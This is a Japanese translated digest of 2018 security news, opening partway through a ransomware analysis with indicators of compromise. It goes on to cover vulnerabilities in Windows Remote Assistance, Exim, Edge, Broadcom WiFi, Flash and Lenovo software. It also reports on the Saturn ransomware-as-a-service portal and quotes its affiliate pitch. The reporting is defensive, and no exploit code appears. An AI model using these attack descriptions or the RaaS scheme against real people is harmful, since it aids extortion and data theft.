     見てきたように、この身代金要求型マルウェアは感染したコンピュータを完全に破壊すると共に、同時に暗号化キーをリモートサーバにアップロードしているかのようである。それ故、これが本当に身代金要求型マルウェアなのか、身代金要求型マルウェアを装っているワイパーなのか定かでない。

    IOC

    ハッシュ

    a64dd2f21a42713131f555bea9d0a76918342d696ef6731608a9dbc57b79b32f
    58c7c883785ad27434ca8c9fc20b02885c9c24e884d7f6f1c0cc2908a3e111f2

    ネットワーク接続

    bxp44w3qwwrmuupc.onion

    関連ファイル

    +HOW_TO_UNLOCK.txt
    %AppData%\[username].exe
    %Temp%\libeay32.dll
    %Temp%\libevent-2-0-5.dll
    %Temp%\libevent_core-2-0-5.dll
    %Temp%\libevent_extra-2-0-5.dll
    %Temp%\libgcc_s_sjlj-1.dll
    %Temp%\libgmp-10.dll
    %Temp%\libssp-0.dll
    %Temp%\ssleay32.dll
    %Temp%\t.bmp
    %Temp%\t.zip
    %Temp%\tor.exe
    %Temp%\zlib1.dll

    脅迫文

    lol n


    Windowsリモートアシスタンス・ツールは標的型攻撃に使用される
    BleepingComputer : News>Security (2018/03/20)
     全てのWindowsのバージョンに搭載されているWindowsリモートアシスタンス・ツールは、狡猾なハッキングを行うことで標的型攻撃に悪用することができる。
     Nabeel Ahmed(ベルギーのセキュリティ研究者)は昨年2月にこのツールの脆弱性を発見し、10月にMicrosoftに通知した。CVE-2018-0878として追跡されるこの問題のパッチは、先週リリースされた2018年03月のMicrosoftの定例パッチに含まれていた。

    データ抽出に理想的な脆弱性

     この脆弱性は、犠牲者の認識なしにコンピュータからあらゆるファイルを抽出し、それをリモートサーバにアップロードすることを可能にするものである。
     このため、この脆弱性は、データを抽出するには最高のものであり、犠牲者のコンピュータからあらゆるファイルをコッソリ盗むために使用することができる。
     良いニュースは、この脆弱性は大量悪用攻撃できないことであり、犠牲者を欺いてリモートアシスタンス・セッションを開くにはソーシャル・エンジニアリングを必要とすることである。

    このハックの動作方法

     この脆弱性もしくはハックの動作方法を理解するには、ユーザは最初にWindowsリモートアシスタンス・ツールの動作方法を理解する必要がある。
     名前が示しているように、これはMicrosoftによって作成されたTeamViewerに類似したリモートヘルプツールであり、XP以降の全てのWindowsバージョンに同梱されている。
     誰かが、このリモートアシスタンス・ツールを介して他のユーザの支援を要請すると、このアプリケーションは"Invitation.msrcincident"と名付けられたファイルを生成する。
     支援の要請を受けたユーザはeMailを介して、あるいは、他の任意の方法で支援に同意した人に、このファイルを送信する必要がある。「支援をする者」は、「要請をした者」のコンピュータにリモートデスクトップ・セッションを介して接続するために、このファイルをダブルクリックする必要がある。
     "Invitation.msrcincident"は、様々な設定データを含むXMLファイルである。Ahmedは、Microsoftが、このファイルをサニタイズ(【訳註】 テキストデータ上の「&」や「>」など特殊文字を一般的な文字列に変換する処理のこと(IT用語辞典より))することに失敗しており、Invitation Fileに著名なXML External Entity(XEE)悪用攻撃を埋め込むことが可能であることを発見した
     犠牲者がブービートラップされたInvitation.msrcincidentを開くと、犠牲者のWindowsリモートアシスタンス・ツールは、ローカルファイルを取得し、それをリモートサーバにアップロードするように欺かれる。

    標的型攻撃に役立つハック

     攻撃者は、標的のPC上に存在することが知られている機密情報(ログ、バックアップ、データベースファイル、INI、その他パスワードや他の設定オプションを含む設定ファイル)を含むファイルを獲得するために、この脆弱性を利用することができる。
     上述したように、この種の脆弱性は、大量悪用攻撃することはできないし、最初に、犠牲者に技術サポートを提供することに同意してもらう必要がある。それ故、CVE-2018-0878は、技術アシスタントを提供してもらおうとする特定の知名度の高い個人に対する標的型攻撃の極一部に関してのみ理想的である。
     Microsoftは、Windows 7以降の全てのバージョン用のパッチを出荷した。最先端のWindows 10に関しては、Microsoftは、時代遅れのリモートアシスタンスを新しいクイックアシスト(Quick Assist)に置き換えている。Quick Assistは、Invitation Fileの代わりにInvite Codeを使用しているので、この種の攻撃に対する脆弱性は存在していない。


    身代金を支払った人々の半分しかデータは復元されていない
    BleepingComputer : News>Security (2018/03/09)

     約1200人のITセキュリティ実行者と17ヵ国の意思決定者による大規模な調査は、昨年身代金要求型マルウェアに感染し、身代金を支払った犠牲者の半分しかファイルを復元できなかったことを明らかにした。
     研究者とマーケティング企業CyberEdgeグループによって実行されたこの調査は、例え深刻な理由からであろうとも、身代金を支払っても、犠牲者がファイルへの再アクセスを保証されていないことを明らかにしている。
     時宜にかなったバックアップは、簡単に復元が可能なので、依然として身代金要求型マルウェアに対する最も効果的な防御策である。

    全犠牲者の1/4を越える人々が永遠にデータを失っている

     この調査は、全回答者の55%が2017年中に身代金要求型マルウェアに感染していることを明らかにしている(前年の研究結果と比較すると、類似の感染者は61%)。
     身代金要求型マルウェアに感染した犠牲者の内、CyberEdgeは61.3%の人が最終的に身代金を支払っておらず、そのうちの8%の人々は永遠にデータを失っている。残りの53.3%の人々は、バックアップや身代金要求型マルウェア復元アプリケーションを使用して、何とかファイルを復元している。
     身代金の支払いを選択した38.7%の人々の内、半分未満(19.1%)の人々が、その身代金要求型マルウェアの作者によって提供されるツールを使用してファイルを復元している。
     残りの19.6%の人々はデータを失っている。これは、身代金要求型マルウェアの作者が、復号指示やアプリケーションを提供していないのか、それらのツールが期待されている結果をもたらさなかったかの何れかである。
     全体的に、この研究は、身代金を支払おうが支払うまいが、身代金要求型マルウェアの犠牲者の1/4を超える人々(27.6%)が、彼らのデータを永遠に失っていることを発見している。
     CyberEdgeの調査の他の発見は以下である。

      ・ 全組織の77%が、2017年にサイバー攻撃で傷つけられている(2016年は79%以下)。
      ・ セキュリティ関連予算は昨年に比べ4.7%増えると予測されている。
      ・ セキュリティ関連予算は、2018年では、企業のIT予算全体の12%を占めると予想されている。
      ・ 4/5の組織が、ITセキュリティ技術を持つ人材の不足を経験していると発言している。
      ・ 9/10の企業がクラウドセキュリティと個人情報問題を経験している。
      ・ 調査回答者は、セキュリティに関する組織の最弱点のリンクは、モバイルデバイスとアプリケーション・コンテナ(Docker, Kubernetes, Cloud Foundry)であることに気が付いていると発言している。
      ・ 回答者は、2018では、彼らが高度なマルウェア解析/サンドボックス化(ネットワーク・セキュリティ)、コンテナ化/マイクロ仮想化(エンドポイントとモバイルセキュリティ)、そして、APIゲートウェイ(アプリケーションとdata-centric security(【訳註】 ネットワーク・セキュリティよりむしろ、データそれ自体のセキュリティを強調するセキュリティアプローチ))に金銭を投資することを計画していると発言している。


    InternetのEmailサーバーの半分に影響を与える脆弱性
    BleepingComputer : News>Security (2018/03/06)
     この緊急の脆弱性は、数十万のEmailサーバーに影響を与える。修正はリリースされているが、このフローは、半分を超えるインターネットのEmailサーバーに影響を与える。そして、この問題にパッチすることは、数カ月はかからないにしても数週間はかかるだろう。
     このバグは、Emailサーバー上で実行され、送信者から受信者へEmailを中継するEximソフトウェア(メール転送エージェント(MTA))中の脆弱性である。
     2017年3月に行われた調査によると、インターネットEmailサーバー全体の56%(その時点で56万を超える)がEximを実行していた。より最近の別のレポートは数百万に上るとしている。

    このバグはリモートコード実行を可能にする

     Meh Changと名乗る台湾のセキュリティ研究者が、このバグを発見した、そして、彼は2月2日に、この問題をEximのクルーに報告した。Eximチームは、このRCE(【訳註】 リモートコード実行)問題を修正するEximディストリビューション 4.90.1を2月10日にリリースした。
     このバグ(CVE-2018-6789)は、"pre-auth remote code execution"(認証前リモートコード実行)として分類される。これは、攻撃者がサーバーに認証される前に、Exim Emailサーバーを欺き、悪意あるコマンドを実行できることを意味している。
     実際のバグは、EximのBase64デコード関数中の1-バイト バッファオーバーフローであり、今迄にリリースされたEximの全てのバージョンに影響を与える。
     Changは、本日早朝にリリースされたブログへの投稿で、このバグを説明(EximのSMTPデーモンを悪用するための基本ステップを詳らかにするために)した。

    Proof of Concept(概念の実証)や悪用コードは存在していない

     セキュリティ・アドバイザリにおいて、Eximチームは公にこの問題を認めた。「現在、我々は重大性に関しては不確かである。我々は、悪用は困難であると確信している。緩和策は知られていない」と、Eximチームは発言している。
     Exim 4.90.1 がリリースされたので、アップデートされたEximバージョンは、第一にデータセンター中で使用されているLinuxディストリビューションにジワジワ伝わっていく。しかし、問題は、オンライン上に残っている未パッチのシステムの数にある。Eximが最も人気のあるメール・エージェントであることを考慮すると、CVE-2018-6789は、大きな攻撃領域を開いているので、Eximサーバーの所有者は、可能な限り早急に、Exim 4.90.1の配備を検討すべきである。
     記述している時点で、脆弱性のあるEximサーバーを悪用するための公開されている攻撃コードは存在していない。しかし、これは、Changのブログへの投稿に従うなら、多分これは、今後変わるだろう。
     Changはまた、昨年二つの他のEximバグを発見している。これもまた、リモートコード実行を導く。これらのバグは、Exim 4.90でパッチされている。


    新しいSaturn RaaSは、無料であらゆる人を身代金要求型マルウェアの配布者にする
    BleepingComputer : News>Security (2018/02/18)
     新しく発見されたSaturn身代金要求型マルウェアの作者は、新しく起動したRansomware-as-a-Service (RaaS、サービスとしてのランサムウェア)を介して無料であらゆる人を身代金要求型マルウェアの配布者にしている。
     新しいRaaSポータルの全体構想は、新しいSaturn身代金要求型マルウェアの兵器化されたバージョンへの簡単アクセスを可能にすることである。
     身代金要求型マルウェアの配布者になりたい者が実行しなければならないことは、Saturn身代金要求型マルウェアのコピーを得るためにダークウェブ(【訳註】 匿名性が前提され、一般的なインターネット閲覧手法では閲覧できずアクセスする手がかりもない環境にあり、多くは非合法のやりとりのために用いられるウェブ上のコンテンツの総称(Weblioより))上にホストされているこの新しいポータルにサインアップし、それを広めることである。
     過去にBleeping Computerが解析した他のRaaSポータルは、身代金要求型マルウェアのバイナリの兵器化されたバージョンにアクセスする前に、通常ユーザに前払い金を要求する。このSaturn RaaSは、最初から前払金無しで、この兵器化された身代金要求型マルウェアのバイナリを、誰もが手にできる全く新しいRaaSビジネスモデル アプローチを取っている。

    系列は身代金の70%を得る

     そのようなファイルの一つ(Saturn RaaSインターフェースにおいてはスタブと呼ばれる)を生成するユーザは、次に、EXE、Office, PDF, 他のドキュメントのような他のファイルに、それを埋め込まなければならない。これらのファイルは、次に、最も一般的な二つの身代金要求型マルウェア拡散方法であるスパムメールや悪意ある広告キャンペーンの一部としてユーザに送信される。
     感染させられた犠牲者は、su34pwhpcafeiztt.onionに配置されたSaturn支払いポータルで復号料金を支払わなければならない。この金はSaturn身代金要求型マルウェアの作者のメインBitcoinアカウントに入る。
     犠牲者に感染したファイルがRaaSポータルで生成されたのであれば、Saturnの作者が30%を確保し、ファイルを生成し、それを犠牲者に拡散したユーザは、全支払金額の70%を受け取る。

     サインアップした後、あなたのアカウントにログインし、新しいウィルスを作成し、それをダウンロードする。これで、あなたは、作成したこのウィルスで人々への感染を開始する準備ができた。ここで、重要なことは、70%のBitcoinが、あなたの口座に入る。例えば、あなたが身代金を $300 とした場合、あなたは $210 を得、我々は $90 を得る。

     Saturnの7:3の分け前は、Cerber RaaS(今日、最大の身代金要求型マルウェア オペレーションの一つ)の分け前と同じようなものである。
     Saturn RaaSは、現在、登録受付中であり、既にダークウェブのURLスキャナとディレクトリに現れている。あなたのレポーターは、Saturn RaaSのアカウントにサインアップした。以下が、そのポータルの現在のGUIと機能のスクリーンショットである。


    Saturn RaaSダッシュボード(画像をクリックすると拡大します)


    Saturn RaaSチャット(画像をクリックすると拡大します)


    Saturn RaaSスタブ ビルダー(画像をクリックすると拡大します)


    Saturn RaaS払い戻し(画像をクリックすると拡大します)

     Bleeping Computerは、先週の金曜日、我々の読者が、ここで閲覧できる記事で、Saturn身代金要求型マルウェアを解析した。この身代金要求型マルウェアは、積極的な拡散活動中である。
     サンプルのスタブファイル用のハッシュが、Saturn RaaSから取得された。

    b3040fe60ac44083ef54e0c5414135dcec3d8282f7e1662e03d24cc18e258a9c

    GandCrabもまた、RaaSを介して提供されていた

     激しい配布活動が見られるもう一つの身代金要求型マルウェアは、GandCrab身代金要求型マルウェアである。この株もまた、RaaSに似た悪巧みで提供されている。
     ペルー人のセキュリティ研究者David Montenegroは、GandCrabが、ロシア語ユーザ用の悪名高いサイバー犯罪フォーラムで売り歩かれていることを発見した(David Montenegroのブログはこちら)。


    Googleが、Microsoft Edgeのセキュリティ機能のバイパスを公開
    BleepingComputer : News>Security (2018/02/17)

     Googleは、攻撃者がMicrosoft Edgeブラウザのセキュリティ機能の一つ(Arbitrary Code Guard(ACG))を悪用し、バイパスすることのできるEdgeの脆弱性に関する詳細を公開した。
     ACGは、Edgeセキュリティモデルに追加された比較的新しい機能である。Microsoftは、Windows 10 Creators Updateのリリースに伴い、2017年04月にEdgeにACGサポートを追加した。
     ACGは、攻撃者がEdgeを介してコンピュータのメモリに悪意あるコードをロードするためにJavaScriptを使用することから妨げるだろうと、Microsoftが発言した二つの新しい機能の二番目のものである。Microsoftは、昨年のブログで、この二つのセキュリティ機能を説明している。ACGとCode Integrity Guard(CIG)の概要は以下である。

     アプリケーションは次のどちらかによってメモリに悪意あるネイティブ コードを直接読み込むことができます。
    1) 悪意のあるDLL / EXEをディスクからロードするか、
    2) メモリ内のコードを動的に生成/変更します。
    CIGは、Microsoft EdgeのDLLコード署名要件を有効にすることで、最初の方法を防止します。これにより、適切に署名された DLL のみがプロセスによってロードされるようになります。ACGは、署名されたコードページが不変であり、新しい符号なしコードページを作成できないことを保証することによってこれを補完します。
    (【訳註】 和訳は、Microsoft Edge Japanより引用)

    GoogleのエンジニアはACGをバイパスする方法を発見した

     GoogleのProject Zeroチームのセキュリティ エンジニアIvan Fratricは、ACGをバイパスし、攻撃者がメモリ中に未署名のコードをロードすることを可能にする方法を発見した。これは、攻撃者がEdgeにロードされた悪意あるWebサイトを介してWindowsに入り込むことを可能にするものである。
     Fratricは、昨年11月、個人的なバグレポートでMicrosoftにこの問題を通知していたが、バグ修正の期限を過ぎた。
     「この修正は、当初見込まれていたより複雑である、そして、メモリ管理問題に起因するために、我々は、おそらく2月のリリース期限を守ることはできないだろう...」と、MicrosoftはFratricに告げている。
     「(Microsoft Edge)チームは、この修正を3月13日にリリースするために準備している」と、Microsoftは追加している。

    Fratricが発見した二回目のEdgeのバグ

     この問題に関する詳細が今や公開された。これは、FratricがEdgeのバグを公開した最初の事例ではない(昨年2月にも、公開している)。
     Fratricは、Domato(ブラウザエンジン中のセキュリティ上の欠陥を発見するためのファジング・ツール(【訳註】 ソフトウェアの不具合(とくに脆弱性を意図することが多い)を発見するためのテスト・ツール(Wikipediaより))の作者でもある。


    Lenovoは、多くのThinkpadモデルに影響を与える緊急のWiFi脆弱性を警告
    Kaspersky : ThreatPost (2018/02/09)
     Lenovoは、金曜日に、人気のあるThinkPadブランドの25のモデルに影響を与える二つの緊急のBrpadcom脆弱性を顧客に警告した。この脆弱性は、最初、9月に明らかにされ、当初それらは、Apple iPhones, Apple TV, Androidデバイス中に使用されている特定のチップセットに影響を与えるだけだと報道されていた。
     Lenovoは、Windows 10用のBroadcomのBCM4356 Wireless LANドライバを使用している凡そ2ダースのThinkPadを含むようにこのリストを拡大した。Lenovoアドバイザリによると、このWiFiチップセットは、AppleとGoogleによって9月にパッチされた同じファームウェアの脆弱性(CVE-2017-11120CVE-2017-11121)を含んでいる。
     二つの脆弱性は、バッファオーバーフローを含むBroadcomのワイアレスLANドライバによって使用されているコントローラに結び付けられている。これは、このアダプタ上で任意のコード実行を獲得できた攻撃者が悪用することができるものであるが、システムのCPUをターゲットにしているものではない。二つのCVEは、「緊急」と評価されており、MitreのCVSSスケールでは、スコア10である。
     脆弱性CVE-2017-11120は、6月にGoogle Project Zeroの研究者Gal Beniaminiによって最初に同定され、9月に「概念の実証」バグレポートとして公に公開された。
     「この脆弱性攻撃が成功すると、バックドアが、このファームウェアに挿入され、巧みに細工されたアクション フレーム(これらは、WiFiチップをリモートから簡単に制御することを可能にする)を介して、このファームウェアにリモートからの読込みや書き込みコマンドを発生させることが可能になる」とBeniaminiは発言している。
     この脆弱性は、iPhoneと他の製品(Apple TVで使用されているtvOSと、Apple Watchで使用されているwatchOSを含む)でAppleによって使用されているBroadcomチップ中に存在している。Androidもまた、同じチップを使用している。Googleは、9月にAndroid Security Bulletinでこのバグをパッチしている。
     脆弱性CVE-2017-11121もまた、Beniaminiによって発見された。これは、WiFiシグナルの不適切な検証によって発生させられるバッファオーバーフロー脆弱性である。研究者によると「適切に細工された悪意ある無線Fast Transitionフレームは、潜在的に内部WiFiファームウェアのヒープやスタックオーバーフローを引き起こし、DoSやその他の影響を引き起こす可能性がある。」
     この脆弱性はまた、GoogleのAndroid OSと連動してApple iOSやtvOSにも影響を与える。
     Lenovoは、影響を受けるThinkPadの顧客に、彼らのWiFiドライババージョンをアップデートするように推奨している。影響を受けるThinkPadの商品識別番号は、ThinkPad L460, ThinkPad P50s, ThinkPad T460, ThinkPad T460p, ThinkPad T460s, ThinkPad T560, ThinkPad X260, ThinkPad Yoga 260である。


    WordPressユーザへ: 今アップデートを手動で実行しなさい
    Sophos : NakedSecurity (2018/02/08)
     WordPressが大変厄介なバグをアナウンスした。
     今週初め、この世界で最も広汎に使用されているブログとコンテンツ配信プラットフォームは、バージョン4.9.3 Maintenance Releaseを送り出した。
     このパッチには、緊急のセキュリティパッチは存在していないが、34のバグフィックスが存在していた。そして、誰かが、即座にバグフィックスすることを望んでいただろうか?
     4年以上に渡り、WordPressをアップデートすることは、大変簡単であった。あなたは、一つの単語もタイプする必要なく、ただボタンを押すだけだった。
     WordPress 3.7が出現した2013年10月に遡り、Naked SecurityのMark Stockleyの記述がある。

     我々は、デスクトップ、タブレット、ラップトップ、スマートフォンで、バックグラウンドでそれ自体を暗黙のうちにパッチするこのソフトウェアの考えに完全に慣れた。そして、だいぶ遅れたとはいえ、この人気あるWebソフトウェアが追いつくのを見ることは良いことである。
     WordPressがこのような重要なステップをバックグラウンドでアップデートすることは、このソフトウェアにとって一番受けが良いことである。世界中のWebサイトで、どのくらいWordPressを稼働しているのか誰も定かにできていないが、意見の一致するところでは、凡そ15から20%とされているようである。

     今日、幾つかの見積は、WordPress Webサイトはもっと多く共有されている(20%を超える)としているので、自動アップデートは2013年当時よりずっと重要になっている。

    22のバグの落とし穴

     残念ながら、WordPress 4.9.3は、アップデート・バグを導いた。4.9.3に自動アップデートした後、WordPressはもはや自動アップデートをしない。
     良いニュースは、既に4.9.4が出現していることである(翌日に緊急の修正として公開された)。
     しかし、悪いニュースは、あなたが、もう一度2012年の状態を装い、手動でアップデートする必要があるということである。
     あなたが、4.9.4を取得したら、自動アップデートは修復されるだろう。4.9.5が出現したら、それは、あなたが期待しているようにそれ自体の面倒をみるはずである。

    何をすべきか

     WordPressはバグの説明と「手動」でのアップデートに関する詳細な説明を公開している。長過ぎて、全部読まなかったが、

     あなたのWordPress Dashboard > Update を単純に訪問し、"Update Now"をクリックする。

     遅れるな。この操作を今日実行しなさい。そうすることで、これを忘れてしまい、将来窮地に陥るリスクが失くなる。
     他の人があなたのためにWordPressサーバーをホストしているのであれば、その人が、あなたに既に通知している場合を除き、今週の二つのアップデートを完了したか否かを確認しなさい。


    研究者が身代金要求型マルウェアを防御するWindowsのControlled Folder Accessをバイパスする方法を発見した
    BleepingComputer : News>Security (2018/02/06)
     セキュリティ研究者は、2017年10月に追加されたWindows 10中の"Controlled Folder Access"機能をバイパスする方法を発見していた。これはMicrosoftが信頼あるアンチ-身代金要求型マルウェア防御機能として大げさに宣伝していたものである。
     Bleeping Computerのレビューで詳細に説明されているこの機能は、Windows 10の全てのバージョンに組み込まれているWindows Defenderアンチウィルスの一部である。
     Windows 10 Fall Creators Updateにアップデートしたユーザは、Controlled Folder Access (CFA)と名付けられたWindows Defender用のアップデートを受け取っている。これは、ユーザが指定したディレクトリ中に見出されるファイルに対するあらゆる改竄をブロックすることをユーザに可能にするものである。
     ユーザは、CFAフォルダ中に配置されたファイルの編集を許可した全てのアプリケーションを、各アプリケーションの実行ファイルを手動で、"Allow an app through Controlled folder access"(フォルダー アクセスの制御を通じてアプリを許可する)オプションを介して管理されているホワイトリストに追加することによって承認しなければならない。


    Controlled Folder Access(アプリケーション ホワイトリスト)

    しかし、SecurityByDefaultのスペインのセキュリティ研究者Yago Jesusは、Microsoftが、このリストに全てのOfficeアプリケーションを自動的にホワイトリストしていたことを発見した。これは、ユーザが好むと好まざるとに拘わらず、OfficeアプリケーションがCFAフォルダ中に配置されているファイルを改竄できることを意味している。

    身代金要求型マルウェアはCFAをバイパスするためにOffice OLEオブジェクトを使用することができる

     身代金要求型マルウェア開発者は、Officeファイルの内部にOLEオブジェクトを介してCFAをバイパスする簡単なスクリプトを追加することでMicrosoftのCFAアンチ身代金要求型マルウェア機能を簡単にバイパスすることができると、Jesusは発言している。
     週末に公開された研究において、Jesusは、CFAフォルダの内部に格納された他のOfficeドキュメントのコンテンツを上書きし、この同じファイルをパスワードで保護したり、あるいは、CFAフォルダの外にあるファイル内部のコンテンツをコピー&ペーストし、それらを暗号化し、そのオリジナルを削除するために、ブービートラップされたOfficeドキュメント(スパムメールを介して受信される)を悪用した三つの例を挙げた。
     最初の例は単に破壊的なものだが、後の二つは実際の脅迫として機能し、被害者は、この身代金要求型マルウェアの作者に身代金を支払い、ファイルのロックを解除するパスワード(復号コード)を入手しなければならない。

    JesusはMicrosoftに嫌気がさした

     Jesusは、彼が発見した問題をMicrosoftに通知したと発言している。彼がMicrosoftから受け取ったeMailのスクリーンショットにおいて、Microsoftは、この問題をセキュリティ上の脆弱性と分類しておらず、報告されたバイパス方法を解決するために、今後のリリースでCFAを改善するだろうと発言したとしている。
     彼が指摘した問題についてクレジットやバグ・バウンティの報酬を得ることはないと言及しつつ、「これは、Microsoftが認識なしでの緩和策のバイパスとして認識したこの脆弱性を修正することを本当に意味している」と、Jesusは発言している。


    Microsoftからのメールのスクリーンショット


    AdobeがFlashの0-Dayを警告している。パッチのリリースは来週
    Sophos : NakedSecurity (2018/02/02)
     1998年の再来のようである!
     多分、2008年の再来と言ったほうが正しいだろう。
     ...Adobe Flash中に0-Dayのセキュリティホールがある。
     Adobeの今年最初のFlash Security Advisory(APSA18-01(【訳註】 APSA18-01に関するIPA情報処理推進機構のサイトはこちら))で、Adobeは以下のように警告している。

     Adobeは、CVE-2018-4878に関する脆弱性攻撃がオンライン上に存在しており、それが、Windowsユーザに対する標的型攻撃として限定的に使用されているとするレポートに気が付いている。これらの攻撃は、eMailで配布された悪意あるFlashコンテンツが埋め込まれたOfficeドキュメントを悪用している。

     ここで専門用語を再考する:

      ・ CVE-2018-4878は、Flash中のセキュリティ バグや脆弱性を同定する代用語である。
      ・ 脆弱性攻撃という言葉は、この脆弱性を引き金にし動作しているブービートラップされたファイルが存在していることを意味している。
      ・ 悪意あるFlash脆弱性攻撃ファイルのキャリアとしてのOfficeドキュメントの使用と、外部からユーザにマルウェアを押し付けるためにeMailを使用していることは、これがリモート攻撃であることを意味している。
      ・ あなたのコンピュータを欺くために、警告なしに外部から送信されるプログラムコードを実行する脆弱性攻撃は、RCE(Remote Code Executionの頭文字)と呼ばれ、最も危険な種類の脆弱性攻撃である。
      ・ RCEは、犯罪者が発見し、パッチが準備される前に、それを最初に使用することから0-Dayと呼ばれる。即ち、あなたが積極的にパッチを適用するまで0-Dayが存在している。

     良いニュースは、Adobeが、再来週の定例のパッチの火曜日(2018/02/13)まで待つのではなく、来週(2月5日から始まる週)パッチをリリースしようとしていることである。
     悪いニュースは、勿論、来週まで利用できないことであり、それまで、この脆弱性は0-Dayのまま残ることになる。

    何をすべきか?

      ・ あなたがFlashを必要としていないのであれば、Flashをアンインストールしなさい。我々がFlashに関して聞く最も一般的な「必要性」は、Webビデオを見ることであるが、殆どすべてのWebサイトは、あなたがFlashを持っていない場合に備えてビデオ用にHTML5を使用している。あなたがFlashをアンインストールしても、あなたのブラウザは、代わりに、組み込みのビデオプレーヤーを使用するので、おそらく、あなたは全くFlashを必要としないはずである。
      ・ あなたがFlashを必要であると確信している場合を除いて、とにかくFlashをアンインストールしてみなさい。重大な何かが機能停止した場合には、あなたはFlashを常に戻すことができる。
      ・ できる限り早急にAdobeのアップデートを入手しインストールしなさい。あなたが予防措置としてFlashをアンインストールした場合は、新しいバージョンが出現するまでFlashを再インストールしないようにしなさい。

     あなたのブラウザのFlashをOFFにするだけでは十分ではないことに注意しなさい。これはWebページに埋め込まれたFlashファイルをブラウザ中でレンダリングすることを妨げるが、あなたのコンピュータから完全にFlash Playerを削除しているわけではない。
     我々は、犯罪者が、あなたのブラウザをバイパスするためにOfficeドキュメント内部にブービートラップされたFlashファイルを埋め込んでいると仮定している。そして、ここは、多くのユーザがFlashの再生を既にブロックしているか、特定のWebサイトでだけFlashをアクティベートしている場所である。


    LenovoのThinkPad Manager中のメジャー セキュリティフローは、ハッカーがあなたのラップトップにアクセスすることを可能にする
    Bitdefender : Hot For Security (2018/01/31)
     LenovoのThinkPad Manager Proソフトウェア中の緊急の暗号化脆弱性は、Windows 7, 8, 8.1を稼働しているラップトップの指紋認証をバイパスすることで、ハッカーがユーザのコンピュータにアクセス可能であることを明らかにした。Lenovoは先週、セキュリティアドバイザリで、これを確認している。
     「この脆弱性は、Lenovo Fingerprint Manager Pro中に特定された。Lenovo Fingerprint Manager Proによって格納された極秘データ(ユーザのWindowsログオン認証と指紋データ)は、ハードコードされたパスワードを含む弱いアルゴリズムを使用して暗号化されており、ローカルの非管理者アクセス権限の全てのユーザが、これがインストールされているシステムにアクセス可能になっていた」と、このステートメントは読める。
     Windows 10を実行しているデバイスは、Microsoftの指紋リーダーを使用しているので影響を受けない。
     この脆弱性を悪用するには、ハッカーは、ローカルアクセスが要求された時、直接自分でそれを実行しなければならない。
     Fingerprint Manager Proアプリケーションのパッチは1月25日にリリースされている。脆弱性のあるモデルを使用しているユーザは、バージョン 8.01.87 をダウンロードしインストールするよう促されている。

     脆弱性のあるモデルは以下である。

      ThinkPad L560
      ThinkPad P40 Yoga, P50s
      ThinkPad T440, T440p, T440s, T450, T450s, T460, T540p, T550, T560
      ThinkPad W540, W541, W550s
      ThinkPad X1 Carbon (Type 20A7, 20A8), X1 Carbon (Type 20BS, 20BT)
      ThinkPad X240, X240s, X250, X260
      ThinkPad Yoga 14 (20FY), Yoga 460
      ThinkCentre M73, M73z, M78, M79, M83, M93, M93p, M93z
      ThinkStation E32, P300, P500, P700, P900


    Microsoftは、Spectre Mitigationsを無効化するWindowsの定例外のアップデートをリリースした
    BleepingComputer : News>Security (2018/01/28)
     Microsoftは、Spectre Variant 2 のバグ(CVE-2017-5715)のパッチを無効化する緊急の定例外アップデートを土曜日にリリースした。
     このアップデート(KB4078130)は、Windows 7 (SP1), Windows 8.1, Windows 10の全バージョンとサポートされる全てのWindows Serverディストリビューションをターゲットにしている。
     Microsoftは、今年1月3日にMeltdownとSpectre用の緩和策を出荷していた。

    MicrosoftはIntelステートメントに反応した

     Microsoftは、Intelがこのバグのために開発されたマイクロコード アップデートが「予期した以上の再起動と、データ損失と損壊を導く他の想定外のシステム挙動」を発生させると公に認めた後、Spectre Variant 2 のバグ用の緩和策を無効化することに決定したと発言している。
     対応として、Microsoftは、Intelがより安定した修正を開発するまでSpectre Variant 2 の緩和策を無効化することに決定した。
     直ぐに、これらのアップデートが影響を受けたコンピュータに展開できない場合は、Microsoftはまた、レジストリキーを介してSpectre Variant 2 の緩和策を手動で無効にする方法の説明を提供している。個別の手順はWindowsデスクトップサーバーユーザに関して利用可能である。

    Microsofだけがこのバグの問題を持っているわけではない

     MicrosoftはSpectre Variantの二つのパッチを取り消した最初の企業ではない。Intelのアナウンスの後、Dellは、Spectreパッチを含んでいない「以前のBIOSバージョンに戻す」ように顧客にアドバイスしている。
     HP(ヒューレットパッカード)はまた、類似のステップを取っている。HPは、MeltdownとSpectre(Variant 1とVariant 2)のパッチを含むBIOSアップデートを利用可能にしていたが、今週MeltdownとSpectre Variant 1のパッチだけを含みVariant 2 は含まないBIOSアップデートを再発行した。
     Red Hat Enterprisesはまた、Intelの公式アナウンスの前であるにも拘わらず、先週Spectre Variant 2 のパッチ取り消すことを決定した。
     IntelはSpectre Variant 2 のパッチで問題を発生した唯一のメジャーCPUメーカーではない。このバグはまた、AMDプロセッサを搭載したデバイスでも問題を発生するので、Microsoftは、AMDプロセッサ用のWindowsアップデートの公開を休止している。Microsoftは、報告されているBSODエラーを修正するためにAMDと共同作業した後に、これらのアップデートを再開している。


    Acronis: 身代金要求型マルウェア プロテクション。さあ、無料の身代金要求型マルウェア防御を手に入れよう
    The Register : Security (2018/01/26)
     Acronisは、AIベースのActive Protectionテクノロジを搭載したフリーでスタンドアロン バージョンのAcronis Ransomware Protectionをリリースした。
     これは、Windowsシステム上で既存のバックアップ製品やアンチウィルス製品と並行して使用することができる。
     この軽量なソフトウェア(20MB)はバックグラウンドで動作し、リアルタイムでシステムプロセスを監視し、あらゆる身代金要求型マルウェア攻撃を自動的に検出し停止させると言われている。身代金要求型マルウェアが検出されると、このソフトウェアは悪意あるプロセスをブロックし、ポップアップでユーザに通知する。このソフトは、身代金要求型マルウェアの影響を受けたファイルの即時復元を手助けする。
     Acronisは、機械学習モデル(AcronisのCloud AIインフラストラクチャ中で数十万の悪意あるプロセスと正当なプロセスを解析することによって生み出された)によって拡張された挙動ヒューリスティックを使用していると発言している。
     このモデルは、このフリーの製品に直接組み込まれており、実行にインターネット接続を必要としない。シグネチャ ベースの製品では検出できない0-Dayの攻撃を含め、全ての身代金要求型マルウェアの株を打ち負かすのに効果的であると、我々は告げられている。
     このソフトウェアはクラウドバックアップ機能を搭載しており、全てのユーザが、無料で5GBのAcronis Cloudストレージを受け取ることができる。
     あなたは、このソフトウェアをテストするためにRanSimの身代金要求型マルウェア シミュレータを使用することができる。この件に関するAcronisのブログはこちら

    追加のコメント

     これは、Acronisによる気の利いたマーケティング戦略である。何らかの役に立つのであれば、無償のアンチ身代金要求型マルウェア ツールを好まないものがいるだろうか? 詳細に関してはこちらを参照しなさい。
